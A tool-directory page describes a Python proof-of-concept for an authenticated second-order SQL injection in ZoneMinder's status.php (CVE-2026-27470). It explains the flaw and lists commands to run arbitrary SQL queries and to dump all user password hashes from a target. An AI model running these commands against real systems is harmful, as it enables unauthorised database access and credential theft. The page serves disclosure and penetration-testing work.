Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2026-27470-POC — Python製のCVE-2026-27470用PoC。ZoneMinderのgetNearEvents()(status.php)における認証済み二次SQLインジェクション、CVSS 8.8 | Kitploit
ツール/GitHubGitHub/d3vn0mi/cve-2026-27470-poc
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト
GitHubd3vn0mi/cve-2026-27470-poc

CVE-2026-27470-POC

Python製のCVE-2026-27470用PoC。ZoneMinderのgetNearEvents()(status.php)における認証済み二次SQLインジェクション、CVSS 8.8

リポジトリを見る
5ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2026-27470 — ZoneMinder 二次注入 SQL 注入 PoC

作者: d3vn0mi | CVSS 8.8 | 需认证 | 需要 Events 权限

概述

CVE-2026-27470 是 ZoneMinder 的 web/ajax/status.php 中 getNearEvents() 函数存在的二次注入 SQL 注入漏洞。

详情值
受影响版本ZoneMinder <= 1.36.37 以及 1.37.61 – 1.38.0
修复版本1.36.38 / 1.38.1
类型二次注入 SQL 注入
是否需要认证是(任何拥有 Events 权限的用户)
CVSS8.8(高危)

工作原理

该漏洞是一个两阶段(二次注入)SQL 注入:

  1. 阶段 1 — 存储:攻击者重命名事件(或编辑其 Cause 字段),使其包含 SQL 载荷。ZoneMinder 对此写入操作使用参数化查询,因此载荷会安全地存储在数据库中——没有 WAF 或过滤器会拦截它。

  2. 阶段 2 — 触发:攻击者通过状态 API 请求 nearevents 实体。getNearEvents() 函数从数据库读取存储的事件 Name/Cause,并未经净化直接将其拼接进新的 SQL 查询,从而导致 SQL 注入。

由于注入向量(存储的数据)与触发点(一个干净的 GET 请求)是分离的,因此这可以绕过大多数输入层面的防护措施。

安装

root@kitploit:~
git clone https://github.com/d3vn0mi/CVE-2026-27470-POC.git
cd CVE-2026-27470-POC
pip install -r requirements.txt

使用方法

基本用法 — 提取数据库版本

root@kitploit:~
python3 poc.py -t http://10.10.10.10 -u admin -p password

自定义 SQL 查询

root@kitploit:~
python3 poc.py -t http://10.10.10.10 -u admin -p password --query "SELECT user()"

导出所有用户和密码哈希

root@kitploit:~
python3 poc.py -t http://10.10.10.10 -u admin -p password --dump-users

凭据默认保存到 dumped_creds.txt。

将结果保存到自定义文件

root@kitploit:~
python3 poc.py -t http://10.10.10.10 -u admin -p password --dump-users -o loot.txt
python3 poc.py -t http://10.10.10.10 -u admin -p password --query "SELECT @@datadir" -o result.txt

通过代理路由(Burp / mitmproxy)

root@kitploit:~
python3 poc.py -t http://10.10.10.10 -u admin -p password --proxy http://127.0.0.1:8080

使用 Cause 字段代替 Name

root@kitploit:~
python3 poc.py -t http://10.10.10.10 -u admin -p password --field Cause --query "SELECT database()"

手动指定事件 ID

root@kitploit:~
python3 poc.py -t http://10.10.10.10 -u admin -p password --event-id 42

详细 / 调试输出

root@kitploit:~
python3 poc.py -t http://10.10.10.10 -u admin -p password -v

选项

标志描述默认值
-t, --target目标 URL(必填)
-u, --usernameZoneMinder 用户名(必填)
-p, --passwordZoneMinder 密码(必填)
--query要执行的 SQL 查询SELECT VERSION()
--dump-users导出所有用户名和密码哈希
-o, --output将结果保存到文件dumped_creds.txt
--event-id用作注入载体的事件 ID(自动检测)
--field注入字段:Name 或 CauseName
--no-restore利用后不恢复事件名称
--proxyHTTP 代理 URL
--timeout请求超时时间(秒)30
-v, --verbose启用调试日志

免责声明

本工具仅供教育和授权安全研究目的使用。请勿将其用于您不拥有或未经明确书面许可测试的系统。作者不对因使用本工具造成的任何滥用或损害负责。

参考

  • ZoneMinder 官方网站
  • ZoneMinder GitHub 仓库
ツールをダウンロード